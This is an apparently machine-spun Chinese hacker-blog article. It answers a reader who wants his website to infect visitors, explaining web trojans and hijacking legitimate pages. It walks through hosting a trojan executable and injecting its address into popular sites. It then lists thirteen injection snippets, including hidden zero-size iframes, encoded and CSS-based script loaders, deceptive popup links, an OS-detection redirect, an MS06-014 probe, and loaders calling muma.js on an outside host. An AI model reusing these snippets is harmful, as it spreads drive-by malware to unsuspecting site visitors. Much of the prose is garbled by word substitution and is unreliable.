镜像劫持、网马详细介绍

hacker4年前黑客文章733

今日,有一位网民问了我一个难题,他自己早已拥有网址了,如今他想制成“镜像劫持”这类网址,要是开启它,电脑上就会有将会感柒木马程序。

 

木马病毒是必须开启才有实际效果的,开启标准:要不蒙骗客户积极,要不运用系统漏洞。将会他对木马病毒、镜像劫持、网马这种并不是很了解,因而我刻意发过此一篇文章。

 

一、镜像劫持、网马详细介绍

 

1、镜像劫持

从“镜像劫持”这个词中就了解,它和“木马病毒”摆脱不上关联,确实,镜像劫持的目地便是将木马病毒散播出来。

黑客攻击了一些网址以后,将自身编定的网页木马置入到其网址的网页页面(一般 是在网址首页)中,运用该网址的总流量将自身的网页木马散播出来进而做到自身的目地。

 

2、网马

网马,即“网页木马”,便是将木马病毒和网页页面融合在一起,当打开网站的情况下便会自动下载并运作其恶意代码。

 

二、网页木马运作基本原理

最开始的网页木马便是运用了IE电脑浏览器的ActiveX控制,在运作网页木马的情况下会弹出来一个控件下载提醒,仅有历经客户确定后才会运作在其中的木马病毒。

 

现阶段新式的木马病毒一般 运用IE电脑浏览器存有的系统漏洞来散播网页木马。

自然,如今电脑浏览器不仅就是指IE,也有许多其他的电脑浏览器,比如:Google、百度搜索、360、搜狗搜索、 *** 、火狐浏览器......这些。

 

三、网页页面镜像劫持流程

 

1、申请办理服务器空间:将恶意代码和网马所有上传入该服务器空间,使其能够被浏览,倘若申请办理取得成功后的服务器空间详细地址为“http://www.xxx.com/xxx”;

 

2、提交恶意代码:提交进行后木马病毒的浏览详细地址为“http://www.xxx.com/horse.exe”;

 

3、应用网页页面木马生成器转化成网马:倘若转化成后网马详细地址为“http://www.xxx.com/horse.htm”;

 

4、开展镜像劫持:将转化成后的网马详细地址置入到别的一切正常的网页页面,倘若置入到腾迅的首页“http://www.qq.com/index.htm”;

网页页面镜像劫持流程

 

四、网页页面镜像劫持的完成 ***

 

1、架构镜像劫持

<iframe src=详细地址 width=0 height=0></iframe>

 

2、 *** 文档镜像劫持

更先将下列编码:

document.write("<iframe width='0' height='0' src='详细地址'></iframe>");

储存为xxx.js。

 

则 *** 镜像劫持编码为:

<script language=javascript src=xxx.js></script>

 

3、 *** 形变数据加密

<SCRIPT language=" *** cript.Encode" src=https://www.fujieace.com/muma.txt></script>

muma.txt可改为随意后缀名;

 

4、body镜像劫持

<body onload="window.location='详细地址';"></body>

 

5、隐敝镜像劫持

top.document.body.innerHTML = top.document.body.innerHTML   '\r\n<iframe src="https://www.fujieace.com/muma.htm/"></iframe>';

 

6、css镜像劫持

body {
background-image: url('javascript:document.write("<script src=https://www.fujieace.com/muma.js></script>")')}

 

7、JAJA镜像劫持

<SCRIPT language=javascript>
window.open ("详细地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

 

8、照片掩藏

<html>
<iframe src="网马详细地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

 

9、掩藏启用

<frameset rows="444,0" cols="*">
<frame src="打开网站" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马详细地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

 

10、高級蒙骗

<a href="http://www.163.com(蒙蔽联接详细地址,显示信息这一详细地址偏向木马病毒详细地址)" onMouseOver="www_163_com(); return true;"> 网页页面要显示信息的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马详细地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

 

11、分辨系统软件编码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

 

12、分辨是不是有ms06014编码

<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=https://www.fujieace.com width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=https://www.fujieace.com width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

 

13、智能化载入js的编码demo

//读娶src的目标
var v = document.getElementById("advjs");
//读娶src的主要参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=\"https://www.fujieace.com/1/" u_num ".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'https:\/\/www.fujieace.com\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'https:\/\/www.fujieace.com\/demo.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")
//剖析src的主要参数涵数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i  ){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
标签: 黑客技术

相关文章

Wireshark基础知识

Wireshark基础知识

Wireshark是一款十分时兴的网络抓包分析系统,作用十分强劲。能够提取各种各样互联网封包,显示信息互联网封包的详细资料。wireshark是十分时兴的互联网封包分析系统,作用十分强劲。应用wir...

侧门和木马病毒有什么不同?

侧门和木马病毒有什么不同?

侧门和木马病毒有什么不同? 我觉得严苛实际意义沒有差别的,微小的区别是有的。有一个微小区别先讲一下,这两个词出去早中晚不一样。老一代网络黑客,不屑黑本人设备(那时候本人机网速太慢),觉得网络服务器才...

Charles-yeshen

Charles-yeshen

Charles的应用,我也已不多讲过,通俗化的讲:Charles便是一款抓包软件。 能够参照Charles抓包软件剖析实例教程: https://www.fujieace.com/hacker/ch...

网络服务器是啥系统软件?实际叫什么?及其是多少位几核

网络服务器是啥系统软件?实际叫什么?及其是多少位几核

1、提权的定义:将系统软件管理权限提高到root、 system 或是 administrator。   2、在网上提权的界定:取得网络服务器管理权限,而且取得成功登录网络服务器。 可是,...

TripwireCorp企业如今致力于付钱公司配备操纵商品

TripwireCorp企业如今致力于付钱公司配备操纵商品

什么叫Tripwire? Tripwire是一个文件目录和文档md5验证器。此专用工具可协助计算机管理员和客户查验特定的文档集以开展变更。该专用工具能够 通告管理人员是不是有伪造或毁坏的文档,因而能...

PasswordSafe的典型性主要用途是啥?

PasswordSafe的典型性主要用途是啥?

什么叫Password Safe? Password Safe是一个开源系统的登陆密码数据库工具。客户能够根据应用或键入单独“主密匙”来信息保密登陆密码并将其开启。   Password...